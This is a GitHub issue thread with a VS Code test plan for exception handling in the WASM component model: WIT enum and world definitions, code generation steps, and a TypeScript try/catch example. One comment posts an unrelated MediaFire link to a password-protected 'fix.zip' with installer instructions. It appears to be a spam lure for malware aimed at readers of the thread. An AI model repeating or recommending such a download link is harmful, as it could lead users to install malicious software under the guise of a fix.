### ISSUE TITLE
Test: Exception handling in WASM component model

### ISSUE THREAD

**Issue by dbaeumer** [microsoft/vscode#226605]
Refs: https://github.com/microsoft/vscode-wasm/issues/177

- [x] anyOS @connor4312 
- [x] anyOS @hediet 

Complexity: 3

[Create Issue](https://github.com/microsoft/vscode-wasm/issues/new?body=Testing+%23226605%0A%0A&assignees=dbaeumer)

---

The latest implementation of VS Code's component model converts `result` types returned from function and methods into a normal return type (the Ok part) and an exception.

### Prerequisites
1. [Rust](https://www.rust-lang.org/): installation instructions can be found [here](https://www.rust-lang.org/tools/install)
1. [wasm-tools](https://github.com/bytecodealliance/wasm-tools): releases can be found [here](https://github.com/bytecodealliance/wasm-tools/releases). You need at least version >= 1.200 to run the example.

### Testplan

You can make your own component model sample using the two blog posts as a starter: https://code.visualstudio.com/blogs/2024/05/08/wasm and https://code.visualstudio.com/blogs/2024/06/07/wasm-part2

Easier is to clone the `vscode-extension-samples` and start off the `wasm-component-model` sample
- run `npm install`

- add an `error-code` enumeration to the `calculator.wit` file inside the `types` interface. Something like this:
```
	enum error-code {
		none,
		overflow,
		divide-by-zero
	}
```
- use `error-code` inside the calculator world and change the signature of the calc function to return `result<u32, error-code>`. The world will look like this:
```
world calculator {
	use types.{ operation, error-code };
	import log: func(msg: string);

	export calc: func(o: operation) -> result<u32, error-code>;
}
```
- run `npm run generate:model`
- observe: a new `calculator.ts` file got created with as an ErrorCode enumeration and a corresponding exception.
- adapt the Rust code in `lib.rs` to return `Result::Err(ErrorCode::DivideByZero)` in case a division by Zero happens.
- adapt the TypeScript code in `extension.ts` to catch error when calling a `Div` operation. Ensure that the return exception if of type `Types.ErrorCode.Error_` and its value is `error.value === Types.ErrorCode.divideByZero`. Something like
```
		try {
			const div = Types.Operation.Div({ left: 10, right: 0 });
			channel.appendLine(`Div ${api.calc(div)}`);
		} catch (error) {
			if (error instanceof Types.ErrorCode.Error_ && error.value === Types.ErrorCode.divideByZero) {
				channel.appendLine('Division by zero not allowed');
			}
		}
```

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by hediet** [comment]
Nice work!
